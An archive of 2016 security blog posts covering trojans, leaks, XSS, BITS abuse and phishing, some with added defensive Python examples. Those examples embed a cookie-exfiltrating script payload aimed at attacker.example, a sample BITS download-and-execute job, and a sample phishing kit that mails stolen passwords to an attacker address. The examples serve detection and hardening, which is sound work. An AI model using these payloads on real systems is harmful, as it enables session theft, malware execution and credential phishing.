Security Software & Equipment Store

Thursday, June 30, 2016

Can the US CIA Fight Cyber Terrorism Alone?

Featuring heavily are gadgets such as early secret cameras and bugging devices that would not appear out of character in a Hollywood film. The line-up makes the point that even though the CIA is an intelligence agency whose central mission has been to recruit people to provide secrets, technology has always had a crucial role. Andrew Hallman, who runs the recently created Directorate of Digital Innovation, has the job of making sure that the new digital world works to the CIA's advantage rather than its disadvantage. A major focus of Mr Hallman's effort is to use data to provide insights into future crises, developing what has been called "anticipatory intelligence". This means looking for ways in which technology can provide early warning of, say, unrest in a country. "I think that's a big growth area for the intelligence community and one the Directorate of Digital Innovation is trying to promote," Mr Hallman says. The volume and variety of data produced around the world has grown exponentially in recent years, a process about to accelerate as more and more items as well as people are connected in the so-called internet of things. Developing expertise in open-source (publicly available) information is another priority. In the past this was something of a sideshow at an agency that focused on "secrets", but such information can often help focus on what really is secret and what can be obtained by other means, especially as the definition of open source expands rapidly from the past, when it largely meant foreign news and media. This writer believes that cyber terrorism can only be defeated by a strong partnership between the government and the private sector. Share your thoughts with the Cloud and Cyber Security Center.

Wednesday, June 29, 2016

What are the Highest Risks Third-Party Apps Pose for the Enterprise?

Since the emergence of mobile computing there has been a rise in employees' use of third-party applications, and that rise poses security risks to corporate environments. That is one of the findings in a report CloudLock released last week. The number of third-party apps connected to corporate environments increased roughly 30-fold over the last two years, the firm reported, from 5,500 to 150,000 apps. CloudLock ranked more than a quarter of the apps found in business environments (27 percent) as "high risk," meaning they were more likely than other apps to open pathways into an organization for cybercriminals. Companies have not ignored that danger, CloudLock's researchers also found: more than half of third-party apps were banned in many workplaces over security-related concerns. CloudLock describes its product as a frictionless solution that installs in minutes, protects cloud applications and provides codeless security for custom-built apps, drawing on crowd-sourced security analytics across billions of data points, machine learning and its data-scientist-led CyberLab to deliver actionable cybersecurity intelligence across an organization's entire cloud infrastructure. What are the greatest risks CSOs see from the pervasive use of third-party apps? Let us know your insights here at the Cloud and Cyber Security Center.

Tuesday, June 28, 2016

What is the Impact of BREXIT on Cyber Security?

The immediate response to the British decision to leave the European Union has sent the pound tumbling and raised suggestions that Britain is now a sitting target for cyber criminals. Let's start with the facts. Firstly, Britain is not yet leaving the EU. The referendum has only advisory status on the government, and only the government can choose to leave. That will require a majority vote in Parliament to invoke Article 50 of the Treaty of Lisbon, and that won't happen while David Cameron is prime minister. It is not guaranteed that Parliament will produce that majority, since most MPs do not wish to leave. If and when Article 50 is invoked it will start a two-year period in which both sides negotiate exit terms. Throughout that period the UK will remain a full member of the European Union, and it is in everyone's interest to reach an amicable and smooth exit. The primary security concerns revolve around General Data Protection Regulation (GDPR) issues, a loss of threat intelligence cooperation with Europe, an increasing cost of security (because of the falling value of the pound), and the loss of access to European technical expertise. Each of these should be considered rationally. GDPR is likely to go ahead in the UK. Technically, it must go ahead, since it will become law before the UK actually leaves the European Union. Practically, it will go ahead because it is the easiest way to maintain 'privacy adequacy' and continue easy trading between the UK and Europe. This immediately removes one of the big issues: there will be no need for US companies to move servers from London to The Hague simply to conform to GDPR. How will BREXIT impact cyber security in Great Britain and the nations which remain in the EU? Share your comments with the Cloud and Cyber Security Center.

Friday, June 24, 2016

Banking Trojan "Marcher" Targets European Banks, GMail and PayPal

A threat known as "Marcher", offered on Russian underground forums since late 2013, currently retails for roughly $5,000. The malware initially focused on banks in Germany, but the list of targets was later expanded to include France, Poland, Turkey, the United States, Australia, Spain, Austria and others. IBM Security reported in early June that nine major banks in the UK had also been added to the list of targets. Samples analyzed by PhishLabs this month target the customers of 66 companies, including 62 banks, Google email services and PayPal. IBM reported earlier this month that the United States was the sixth most targeted country, but PhishLabs said on Thursday that the Marcher samples it has analyzed don't target the U.S. "Because the malware can be customized for each individual actor, it is possible that other Marcher samples may include different targets and regions. Expanded targeting seems likely in future based upon this capability," PhishLabs researchers explained. Depending on the cybercrime group using it, Marcher can be delivered via SMS messages, mobile adware, social media websites or spam emails. The newest samples analyzed by PhishLabs have been distributed as fake Adobe Flash Player installers. Like GM Bot and other Android banking Trojans, Marcher uses custom overlay screens, drawn on top of the legitimate app's login screen, to steal credentials from victims. While the Trojan has mostly targeted banking applications, it is also capable of stealing user data from airline, payment, e-commerce and direct marketing apps. How can this malware be mitigated? Send your recommendations to the Cloud and Cyber Security Center:

Thursday, June 23, 2016

Questions Raised About the Tactics Used By Edward Snowden to Inform the NSA

Edward Snowden made a greater effort than originally believed to raise his concerns within the NSA before releasing thousands of classified documents detailing programs that allowed the agency to spy on U.S. citizens. The truth is more complex than the NSA let on, according to Vice News, which reported on documents it secured through two years of Freedom of Information Act litigation. In the aftermath of Snowden's release of a cache of stolen NSA documents, he claimed that he had exhausted all official avenues available to him before going public. "I had reported these clearly problematic programs to more than 10 distinct officials, none of whom took any action to address them," he said in testimony before the European Parliament in March 2014. However, the NSA maintained then and still maintains that it could find only one email message from Snowden that touched on the subject. Snowden did much more than send a single email warning, Vice found.
He had an in-person interaction with one of the people who responded to his email, for example. The NSA, the administration and Sen. Dianne Feinstein, D-Calif., all made efforts to discredit him, the FOIA documents revealed. Snowden stated: "There is a general culture of suppressing dissent in these institutions. Whistle-blowers are needed because there's a lack of oversight and accountability -- particularly of intelligence agencies." Where does the US draw the line between legal and illegal release of sensitive materials obtained under FOIA? Share your assessment with the Cloud and Cyber Security Center.

Wednesday, June 22, 2016

Tor Implements Improved Anonymity Protection - How Secure is Tor Now?

Tor has long focused on improving its security features to ensure users get the privacy they are looking for, while others have been trying to defeat those measures in an attempt to locate users. The FBI, for example, has been exploiting bugs in the underlying Firefox browser to compromise the anonymity of Tor users, but that may soon become much harder. Researchers from the University of California, Irvine (UCI), say that an enhanced and practical load-time randomization technique can be used in Tor Browser to defend against such exploits. Called Selfrando, the solution should improve on the standard address space layout randomization (ASLR) employed by Firefox and other mainstream browsers today. "We collaborated closely with the Tor Project to ensure that selfrando is fully compatible with AddressSanitizer (ASan), a compiler feature to detect memory corruption. ASan is used in a hardened version of Tor Browser for test purposes. The Tor Project decided to include our solution in the hardened releases of the Tor Browser, which is currently undergoing field testing," the security researchers say. According to them, Selfrando is meant to counter code-reuse exploits, in which an attacker first uses a memory-disclosure bug to learn where code already loaded in the browser sits, then chains together fragments of that existing code, rather than injecting new code, to run the attack logic. Because ASLR randomizes only the base address of each library, a single leaked pointer reveals the location of everything else in that library; Selfrando instead randomizes the position of every function at load time, so one leak no longer gives the attacker a usable map of the code. Will these security enhancements strengthen Tor's anonymity where it has fallen short? Share your comments with the Cloud and Cyber Security Center.

Tuesday, June 21, 2016

Microsoft's Application Cross-Site Scripting Security Vulnerabilities and Mitigation Tactics

Memory corruption issues are very common, with stack overflows, heap overflows and integer overflows being some of their subcategories. Vulnerabilities classified as remote code execution (RCE) or arbitrary code execution are often rated most critical, because an attacker who can run code of his choosing may be able to take complete control of a computer. That means he can access all the data (and change, delete or expose it), but the problem is bigger than that. If he gains administrative privileges, he can change permissions on files, add or remove users from the admin group (or create new accounts and delete others altogether), change configuration settings and even use the machine to attack the rest of the network. Escalation-of-privilege vulnerabilities are therefore often exploited in conjunction with RCE flaws to gain that admin access. Web browsers are among the most commonly exploited applications because, unlike most software, they are used by practically everybody on the Internet. Most users have more than one browser installed and use one every day. It is no wonder the browser is a favorite target of attackers hunting for flaws they can leverage to do their dirty work, and a top focus for security researchers who seek to find and report vulnerabilities so they can be patched before exploits appear "in the wild." In 2014, the number of web browser vulnerabilities increased sharply. Cross-site scripting (XSS) flaws are a different class of problem: they are not memory corruption bugs in the browser itself but a common vulnerability in web applications, where untrusted input is placed into a page without proper encoding so that an attacker's script runs in another user's browser session, with that user's cookies and privileges. How can business and personal computer users mitigate XSS flaws? Share your recommendations with the Cloud and Cyber Security Center.
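The following is an added example written for this post; it is not code from Microsoft or from the original article. It shows the XSS pattern described above in its simplest form, a comment body concatenated into HTML, beside the hardened version that escapes every untrusted value at the point of insertion, handles the href case where escaping alone is not enough, and emits a Content-Security-Policy header as a second layer. The attacker payload and the comment text are constructed; the CSP directives are an assumed policy for a site that serves all its own scripts.

```python
"""Added example for the XSS post; not code from Microsoft or the original page.

Vulnerable and hardened renderers side by side, plus a CSP header as defence in
depth. Sample attacker input is constructed; the CSP policy is an assumption.
"""
import html
import re
import secrets


def render_comment_unsafe(author: str, body: str) -> str:
    # Vulnerable: values land in the page verbatim, so a <script> tag executes.
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author: str, body: str) -> str:
    # Hardened: escape at the point of insertion. quote=True also neutralises
    # " and ' so the same helper is safe inside attribute values.
    return (f'<div class="comment"><b>{html.escape(author, quote=True)}</b>: '
            f'{html.escape(body, quote=True)}</div>')


def render_link_safe(url: str, text: str) -> str:
    # Escaping is not enough inside href: "javascript:alert(1)" contains no
    # HTML metacharacters at all, so the scheme must be whitelisted as well.
    if not re.match(r"^https?://", url, re.I):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


def contains_active_content(rendered: str) -> bool:
    # Crude check used only to compare the two renderers' output: is there
    # still a script tag, an on* event handler or a javascript: URL?
    return re.search(r"<script\b|\bon\w+\s*=|javascript:", rendered, re.I) is not None


def csp_header(nonce: str) -> str:
    # With a per-response nonce, inline scripts injected by an attacker do not
    # carry the nonce and are blocked even if an escaping bug slips through.
    return (f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            f"object-src 'none'; base-uri 'none'")


def new_nonce() -> str:
    return secrets.token_urlsafe(16)


# Constructed attacker input: exfiltrates the victim's cookie to an attacker host.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


if __name__ == "__main__":
    print("unsafe:", render_comment_unsafe("mallory", PAYLOAD))
    print("safe:  ", render_comment_safe("mallory", PAYLOAD))
    print("header:", csp_header(new_nonce()))
```

The unsafe renderer emits the script tag unchanged; the safe one turns it into `&lt;script&gt;...`, which the browser displays as text. The href helper shows why output encoding is context-dependent, and the CSP header is the control that limits damage when the application misses a spot.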

Friday, June 17, 2016

Kosovo Man Pleads Guilty to Stealing US Government and Military Personnel Records

A 20-year-old citizen of Kosovo has pleaded guilty to stealing data on more than 1,300 U.S. military and government personnel and providing it to the Islamic State. Ardit Ferizi's goal was to "incite terrorist attacks," the U.S. Department of Justice stated Wednesday. Ferizi once led a hacking group called Kosova Hacker's Security, or KHS, which claims to have defaced over 20,000 websites. Last June he hacked into a U.S. Internet hosting company to steal the personnel data, which included addresses, telephone numbers and email logins. Ferizi used an online account with the name "KHS", which led the FBI to suspect his involvement. He also neglected to cover his tracks: when the FBI examined the hacked server, they found the IP address Ferizi had used to carry out his attack, and the same IP address had been used to access his Facebook and Twitter accounts. He was arrested in Malaysia last year and extradited to the U.S. for trial. He faces a maximum of 25 years in prison. The data he stole was passed to an ISIS member named Junaid Hussain, also a hacker. Hussain was later killed in an airstrike in Syria. It's not the only time Ferizi supplied information to ISIS. Last April, he provided data on dozens of U.S., British and French citizens by sending screenshots of their credit card information. The DOJ called it the first case of its kind. Are there other data thieves seeking to obtain similar data about other US government or military sources? Offer your comments here at the Cloud and Cyber Security Center.

Thursday, June 16, 2016

IBM Releases its Annual Cost of Data Breach Report - Seven Disturbing Trends

IBM has studied the data breach experiences of more than 2,000 organizations over some 11 years, and the research has revealed the following seven megatrends:
1) Data breaches are now a consistent cost of doing business in the era of cybercrime. The evidence showed that this is a permanent risk organizations need to be prepared to deal with, and it needs to be incorporated into data protection strategies.
2) The biggest financial consequence to organizations that experience a data breach is lost business. Following a breach, enterprises need to take steps to retain customers' trust to reduce the long-term financial impact.
3) Most data breaches continue to be caused by criminal and malicious attacks. These breaches also take the most time to detect and contain, and as a result they have the highest cost per record.
4) Organizations recognize that the longer it takes to detect and contain a data breach, the more costly it becomes to resolve. Over the years, detection and escalation costs in the research have increased, suggesting that investments are being made in technologies and in-house expertise to reduce the time to detect and contain a threat.
5) Highly regulated industries such as financial services and healthcare have the most costly data breaches because of fines and the higher-than-average rate of lost business and customers.
6) Improvements in data governance initiatives reduce the cost of a data breach. Incident response plans, the appointment of a CISO, employee training and awareness programs and a business continuity management strategy all result in cost savings.
7) Investments in certain data loss prevention controls and activities, such as encryption and endpoint security solutions, are important for preventing data breaches.
Which data breaches would have the biggest effect on your organization? Share your anonymous comments with the Cloud and Cyber Security Center.

Wednesday, June 15, 2016

Introducing the FBI's Cyber Shield Alliance Program - Defend and Mitigate Cyber Threats

Cyber Shield Alliance (CSA) is an FBI cyber security partnership initiative developed by law enforcement for law enforcement to proactively defend against and counter cyber threats to law enforcement networks and critical technologies. CSA encourages law enforcement participation as a force multiplier in defending national security, while equipping agencies with the training and tools to optimize and defend their own networks. CSA was launched by the FBI Cyber Division as an initiative with the dual responsibility of preventing harm to national security and enforcing federal laws. These two roles are complementary, as threats to the nation's cyber security can emanate from nation-states, terrorist organizations and transnational criminal enterprises, with the lines between them often blurred. The FBI says its mission is enhanced by its long-standing partnerships and joint efforts with the U.S. Intelligence Community and the homeland security enterprise. Through these endeavors, the FBI stewards an array of cyber-security resources and intelligence, much of which is accessible to state, local, territorial and tribal (SLTT) law enforcement agencies through participation in the Cyber Shield Alliance. The importance of a unified front to defend against and counter these cyber threats can't be overstated. SLTT agencies are the first line of defense for U.S. citizens against physical threats and emergencies. Attempts to infiltrate or immobilize these agencies' information systems harm the communities those agencies are sworn to protect, with potentially devastating consequences. Previous attacks have resulted in the theft of highly sensitive information such as operation plans, case files, witness information and workforce personally identifying information. Will this alliance bear fruit by preventing new cyber threats? Send your comments to the Cloud and Cyber Security Center:

Tuesday, June 14, 2016

Can A Cybersecurity Agreement Be Reached Between the US and China?

Two countries - different leadership, different goals. Chinese and American officials said Tuesday they're committed to bridging their differences on cybersecurity and moving to implement recent agreements, as they held talks amid complaints over China-based hacking operations that the U.S. says may have already cost U.S. companies tens of billions of dollars. Repeated meetings between the sides on cybersecurity indicate the seriousness with which the Obama administration regards the issue, the U.S. ambassador to China, Max Baucus indicated at the start of the two-day talks in western Beijing. U.S. officials have been particularly eager to build on an agreement forged during Chinese President Xi Jinping's visit to the White House last September that says neither government will support commercial cyber-theft. The deal was viewed by Washington as a diplomatic breakthrough, although U.S. officials have not conclusively determined that it has led to a decline in hacks against U.S. companies. "We're here today to ensure implementation of agreements made by the two presidents, commitments that illustrate that we can work through areas of differences to reach areas of cooperation," Baucus said, referring to the agreement, which he called a "major advancement."  Can a meaningful agreement be reached or is this an exercise in futility knowing China's deep-rooted cyber strategies? Share your comments with the Cloud and Cyber Security Center:

Thursday, June 9, 2016

How Can the Russian Hacker Be Stopped?

The hacker who last month released 117 million LinkedIn passwords and another 487 million MySpace passwords has this week made available a further 100 million credentials stolen from the Russian social media site VK. He claims to hold a further 70 million accounts but is not yet releasing the remainder. The VK details were obtained some time between 2011 and 2013, and would consequently seem to represent almost all VK members at the time. It is likely that this happened while the company was still headed by founder Pavel Durov; in 2014, under pressure from a Kremlin Internet enforcement effort, he sold his shares and left Russia, later founding the encrypted chat app Telegram. At the time of writing, Durov has made no comment about the VK leak on his Twitter account. The hacker is selling the database on the dark web market The Real Deal for just 1 bitcoin (currently just under $600). He asked 5 bitcoins for his LinkedIn dataset, suggesting that criminals consider LinkedIn users potentially more valuable than VK users. Public news of the leak first appeared on LeakedSource, a repository of hacked credentials. LeakedSource says that the database was "provided to us by a user who goes by the alias ''". It says nothing about how the hacker might have obtained the details, but adds, "This data set contains 100,544,934 records. Each record may contain an email address, a first and last name, a location (usually city), a phone number, a visible password, and sometimes a second email address." The passwords being visible, that is, stored or leaked in plain text, is what makes this dump immediately usable for credential-stuffing attacks against other sites where the same people reuse passwords. What will this hacker target next? Send your predictions to the Cloud and Cyber Security Center:
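The following is an added example written for this post; it is not code from LeakedSource, VK or any vendor named above. When a dump of the "email, visible password" kind described here circulates, the defensive question is which of your own users are exposed because they reused the leaked password. The script parses the dump, looks up each local account and verifies the leaked password against the account's stored salted hash, so the check never requires keeping the plaintext. The user table and dump lines are constructed, and the PBKDF2 work factor is an assumed policy value rather than a standard.

```python
"""Added example for the VK/LinkedIn leak post; not code from any vendor.

Checks a credential dump in the email:password layout against a local user
table stored as salted PBKDF2 hashes. Users, dump lines and the work factor
below are constructed assumptions for the example.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, List, Optional, Tuple

ITERATIONS = 100_000  # PBKDF2-HMAC-SHA256 work factor (assumed policy value)


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest) for a new password, with a fresh random salt per user."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison so the check itself does not leak timing information."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def parse_dump(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Map lower-cased e-mail -> leaked passwords; dumps repeat users and contain junk lines."""
    leaked: Dict[str, List[str]] = {}
    for raw in lines:
        line = raw.strip()
        if ":" not in line:
            continue  # blank or malformed record: skip rather than abort the run
        email, _, password = line.partition(":")
        leaked.setdefault(email.strip().lower(), []).append(password)
    return leaked


def find_reused_credentials(users: Dict[str, Tuple[bytes, bytes]],
                            dump_lines: Iterable[str]) -> List[str]:
    """Return the e-mails whose stored hash verifies against a password seen in the dump."""
    leaked = parse_dump(dump_lines)
    hits: List[str] = []
    for email, (salt, digest) in users.items():
        for candidate in leaked.get(email.lower(), []):
            if verify_password(candidate, salt, digest):
                hits.append(email)
                break
    return hits


# Constructed local user table: e-mail -> (salt, PBKDF2 digest).
USERS = {
    "alice@example.com": hash_password("correct horse battery staple"),
    "bob@example.com": hash_password("Summer2016!"),
    "carol@example.com": hash_password("unrelated-passphrase"),
}

# Constructed dump excerpt in the leak's email:password layout.
DUMP = """\
alice@example.com:correct horse battery staple
BOB@example.com:Summer2016!
carol@example.com:oldpassword123
malformed line without separator
"""


def affected_accounts() -> List[str]:
    """Accounts to force-reset because their current password appears in the dump."""
    return find_reused_credentials(USERS, DUMP.splitlines())


if __name__ == "__main__":
    print("force reset:", affected_accounts())
```

Each verification costs the same PBKDF2 work an attacker would pay, which is why the loop tries only the passwords the dump lists for that specific e-mail rather than the whole dump against every user. Carol's leaked password no longer matches her current hash, so she is not flagged, while Bob is caught despite the dump spelling his address in upper case.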

Wednesday, June 8, 2016

How Effective are Treadstone 71's Cyber Intelligence Services?

Treadstone 71's Reporting and Briefs Service answers clients' and their stakeholders' key questions. It delivers new insights and furthers the client's understanding of the issues. Treadstone's reports present the forces and dynamics at play and articulate a clear line of analysis, with reasoning and evidence supporting each judgment, including source credibility and confidence levels. The firm also provides alternative explanations and identifies important contrary evidence and intelligence gaps. The service does not produce marketing documents, and Treadstone does not attempt to upsell or sell technology; the firm says its interest is in the client's success, and that clients may not always like what they read, because that is how intelligence works. Offerings range from warning intelligence and briefs to adversary dossiers and platforms. Treadstone 71 describes it as a full-spectrum solution that takes the information from a client's SOC and incident response functions and combines it with the political, economic, social, technological, environmental, legislative, industrial, educational and religious aspects of the adversary, along with adversary dossiers and organizational structures. What the client receives is detailed information and intelligence on the adversary that goes well beyond the technical realm. How valuable would the Treadstone 71 Reporting and Briefs service be to your SOC? Share your assessment with our readers here at the Cloud and Cyber Security Center:

Tuesday, June 7, 2016

Cybercriminals Use Windows BITS to Download Malware to Unsuspecting Hosts

A Windows feature that has long been abused by cybercriminals is the Background Intelligent Transfer Service (BITS), and researchers warn that a lesser-known capability in BITS is now being leveraged to download malware. BITS was designed as a native, reliable file transfer mechanism for Windows that uses idle network bandwidth. It is the functionality used to deliver operating system updates, and it is also employed for file transfers by some third-party applications. For over a decade, malware authors have used BITS for illegal purposes, including malware downloads and uploads, launching arbitrary applications, and creating long-lived tasks. Now, researchers with the SecureWorks Counter Threat Unit (CTU) report that a lesser-known capability meant to trigger "notification" actions when jobs complete is being abused. The feature lets malware authors create self-contained, download-and-execute BITS jobs that survive even after the initial malware has been removed from the affected system. The researchers identified active malicious BITS jobs created to download and execute new malware, and explain that these poisoned BITS tasks spawned installation and clean-up scripts after downloading their payloads. Because the tasks live entirely in the BITS job database, they need no malicious files on disk and no registry modifications on the host, which helps them evade detection. Which mitigation measures will be most effective in preventing BITS malware attacks? Send your recommendations to the Cloud and Cyber Security Center:
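The following is an added example written for this post; it is not SecureWorks CTU code. Since a poisoned job leaves nothing on disk, the place to look is the BITS job database itself, and the field that gives a download-and-execute job away is its notification command line. The script parses the text that `bitsadmin /list /allusers /verbose` prints, one record per job, and flags every job whose notification command line is set (legitimate jobs such as Windows Update register a COM callback instead, so the field reads `none`). The sample output below is constructed in that tool's layout so the example runs offline on any platform; `collect_live()` runs the real tool and must be executed from an elevated prompt on Windows so other users' jobs are included.

```python
"""Added example for the BITS post; not SecureWorks code.

Parses `bitsadmin /list /allusers /verbose` output and flags jobs that carry a
notification command line. SAMPLE_OUTPUT is a constructed excerpt in that
tool's layout; collect_live() runs the real tool on a Windows host.
"""
import re
import subprocess
from dataclasses import dataclass, field
from typing import List


@dataclass
class BitsJob:
    guid: str
    name: str
    owner: str
    notify_cmd: str
    urls: List[str] = field(default_factory=list)

    def is_suspicious(self) -> bool:
        # Any non-empty command line means the job will run a program when it
        # finishes or fails; benign jobs use a registered callback, shown as "none".
        return self.notify_cmd.lower() not in ("", "none")


def parse_bitsadmin(output: str) -> List[BitsJob]:
    """Split the tool's output into per-job records and pull out the fields we triage on."""
    jobs: List[BitsJob] = []
    for rec in re.split(r"(?m)^(?=GUID: \{)", output):  # each record starts with "GUID: {...}"
        if not rec.startswith("GUID:"):
            continue  # banner text before the first job
        guid = re.search(r"GUID: (\{[^}]+\})", rec).group(1)
        name = re.search(r"DISPLAY: '([^']*)'", rec)
        owner = re.search(r"(?m)OWNER: (.+?)\s*$", rec)
        notify = re.search(r"(?m)^NOTIFICATION COMMAND LINE: (.*)$", rec)
        urls = re.findall(r"https?://\S+", rec)  # remote side of each "src -> dst" file line
        jobs.append(BitsJob(
            guid,
            name.group(1) if name else "",
            owner.group(1) if owner else "",
            notify.group(1).strip() if notify else "",
            urls,
        ))
    return jobs


def suspicious_jobs(output: str) -> List[BitsJob]:
    return [job for job in parse_bitsadmin(output) if job.is_suspicious()]


def collect_live() -> str:
    """Windows only: run the real tool and return its text output."""
    return subprocess.run(
        ["bitsadmin", "/list", "/allusers", "/verbose"],
        capture_output=True, text=True, check=False,
    ).stdout


# Constructed excerpt: one benign update job and one self-contained downloader.
SAMPLE_OUTPUT = r"""
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.

GUID: {2E1A9B10-5C41-4B77-9D2F-000000000001} DISPLAY: 'Windows Update'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: NT AUTHORITY\SYSTEM
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 524288 / 524288
NOTIFY INTERFACE: REGISTERED NOTIFICATION FLAGS: 3
JOB FILES:
        524288 / 524288 WORKING http://download.windowsupdate.com/d/msdownload/update/x.cab -> C:\Windows\SoftwareDistribution\Download\x.cab
NOTIFICATION COMMAND LINE: none

GUID: {7D6C3F22-8A90-4E15-B3C4-000000000002} DISPLAY: 'Updater'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: WORKSTATION\jsmith
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 73728 / 73728
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 3
JOB FILES:
        73728 / 73728 WORKING http://203.0.113.10/update.exe -> C:\Users\Public\update.exe
NOTIFICATION COMMAND LINE: cmd.exe /c start /b C:\Users\Public\update.exe
Listed 2 job(s).
"""


if __name__ == "__main__":
    for job in suspicious_jobs(SAMPLE_OUTPUT):
        print(f"{job.guid} {job.owner!r} {job.name!r}")
        print(f"  runs:      {job.notify_cmd}")
        print(f"  downloads: {', '.join(job.urls)}")
        print(f"  remove:    bitsadmin /cancel {job.guid}")
```

Cancelling a job with `bitsadmin /cancel <GUID>` deletes it from the job database, which is the only place it exists; removing the downloaded file alone leaves the job free to fetch it again. On recent Windows releases the same fields are exposed to PowerShell through `Get-BitsTransfer -AllUsers` (the `NotifyCmdLine` property), which avoids parsing text at all.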

Monday, June 6, 2016

Russian Police Arrest 50 Hackers for Bank Fraud Using the Lurk Trojan

Russian law enforcement officers have arrested 50 hackers across the country involved in bank fraud using the Lurk trojan, following 86 raids in 15 regions. Fourteen main participants, including the three primary organizers, were arrested in the Sverdlovsk region. An estimated $45 million has been stolen by the gang, while a further $30 million in losses was prevented by the police. The investigation of the Lurk banking trojan gang was assisted by Kaspersky Lab. The hackers had been stealing money from bank accounts in Russia and other CIS countries using the malicious software known as Lurk. Separately, in an analysis published on the same day as the arrests, Zscaler described an Android trojan also named Lurk that mimics the online banking app of Sberbank, Russia's largest bank. "It displays a similar login screen to the original app and steals user credentials as soon as the victim tries to authenticate," Zscaler reports. It can also steal SMS messages and monitor incoming calls in order to defeat one-time passwords and PINs sent by banks as a second authentication factor. Once installed it is difficult to detect or remove: visually there is no difference between the Sberbank app and the trojan, and because the malicious component resides in memory it is not possible to uninstall the app simply by revoking its admin rights. How large a threat is the Lurk trojan to the banking sector in western Europe and the US? Share your assessment with the Cloud and Cyber Security Center:

Friday, June 3, 2016

How Effective Can Law Enforcement Be in Clamping Down on Phishing Web Sites?

It is well documented that "spam" and the malware that comes with it is big business. Security experts estimate that a successful spam (unwanted commercial email) campaign can produce anywhere from $400,000 to $1 million in revenue for a criminal enterprise. The Messaging Malware Mobile Anti-Abuse Working Group (M3AAWG) found that during a 30-month period from January 2012 to June 2014, abusive email (spam, virus-infected messages and the like) accounted for 87.1% to 90.2% of the world's email traffic. The M3AAWG report covered more than 400 million inboxes worldwide. Spammers, according to NW3C Computer Crime Specialist Jeremiah Johnson, have two primary goals: committing fraud and distributing malware. Once executed, malware increases the number of machines available to botnets that spread even more spam or mount attacks on secure networks. Malware most commonly comes in the form of executable files, either delivered through spam emails or hidden behind clickable images or links on websites. Malware infects a machine and allows remote users to take over the system, rendering the machine part of a botnet. Botnet masters (crooks or criminal collectives that control various zombie computer networks) lease their drones to the highest bidders. Understanding the connection between spam and cybercrime, and understanding why malware-distributing or "phishing" sites are such lucrative criminal tools, can help law enforcement track down criminal networks and shut down harmful operations, Johnson said. It is important that more investigators understand how legitimate websites are being compromised to host "phishing" kits that lure unsuspecting victims into giving out their personal information, he explained. How effective can the M3AAWG and law enforcement be in combating malware? Send your comments to the Cloud and Cyber Security Center:
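The following is an added example written for this post; it is not code from NW3C, M3AAWG or the original article. Phishing kits planted on a compromised site tend to share a handful of tells: a PHP script that reads a password or card field from a form, mails or logs it, then redirects the victim to the genuine site, sometimes hiding from crawlers, with the kit's original archive left lying in the web root. The scanner below scores files against those indicators so an investigator can triage a document root quickly. The indicator list and weights are an assumed triage scale, not a standard, and the three "files" are constructed in memory so the example runs offline; `scan()` accepts any path-to-content mapping, so the same logic can be fed from `os.walk` on a real host.

```python
"""Added example for the phishing-site post; not code from NW3C or M3AAWG.

Heuristic scanner for phishing-kit artefacts. Indicators, weights and the
sample files are constructed assumptions for the example.
"""
import re
from typing import Dict, List, Tuple

# (description, pattern, weight): what a kit typically does with harvested input.
INDICATORS = [
    ("harvests a password, PIN or card field",
     re.compile(r"\$_POST\[\s*['\"](pass(word|wd)?|pin|cvv2?|ssn)['\"]", re.I), 3),
    ("e-mails or writes captured input",
     re.compile(r"\b(mail|file_put_contents|fwrite)\s*\("), 1),
    ("obfuscated payload",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I), 2),
    ("redirects to the genuine site after submission",
     re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I), 1),
    ("hides from crawlers or security vendors",
     re.compile(r"HTTP_USER_AGENT.{0,80}(googlebot|phishtank|netcraft)", re.I | re.S), 2),
]
# Kits are uploaded as an archive and unpacked in place; the archive is often left behind.
ARCHIVE = re.compile(r"/(paypal|apple|bank|login|secure)[^/]*\.zip$", re.I)


def score_file(path: str, content: str) -> Tuple[int, List[str]]:
    """Score one file; returns the total and the indicators that fired."""
    score, reasons = 0, []
    for description, pattern, weight in INDICATORS:
        if pattern.search(content):
            score += weight
            reasons.append(description)
    if ARCHIVE.search(path):
        score += 3
        reasons.append("brand-named archive left in web root")
    return score, reasons


def scan(files: Dict[str, str], threshold: int = 3) -> List[Tuple[str, int, List[str]]]:
    """(path, score, reasons) for every file at or above the threshold, highest score first."""
    findings = [(path, *score_file(path, content)) for path, content in files.items()]
    return sorted((f for f in findings if f[1] >= threshold), key=lambda f: f[1], reverse=True)


# Constructed sample: a kit-style harvester, a benign contact form and a leftover archive.
SAMPLE_FILES = {
    "/var/www/html/wp-content/uploads/secure-login/post.php": (
        "<?php\n"
        'if (stripos($_SERVER["HTTP_USER_AGENT"], "googlebot") !== false) { exit; }\n'
        '$msg = "user=" . $_POST["user"] . "&pass=" . $_POST["pass"];\n'
        'mail("drop@attacker.example", "New login", $msg);\n'
        'header("Location: https://www.example-bank.com/");\n'
    ),
    "/var/www/html/contact.php": (
        "<?php\n"
        '$name = htmlspecialchars($_POST["name"]);\n'
        'mail("sales@example.com", "Contact form", $name);\n'
    ),
    "/var/www/html/wp-content/uploads/paypal-verify.zip": "PK\x03\x04 (archive bytes omitted)",
}


if __name__ == "__main__":
    for path, score, reasons in scan(SAMPLE_FILES):
        print(f"{score:2d} {path}")
        for reason in reasons:
            print(f"     - {reason}")
```

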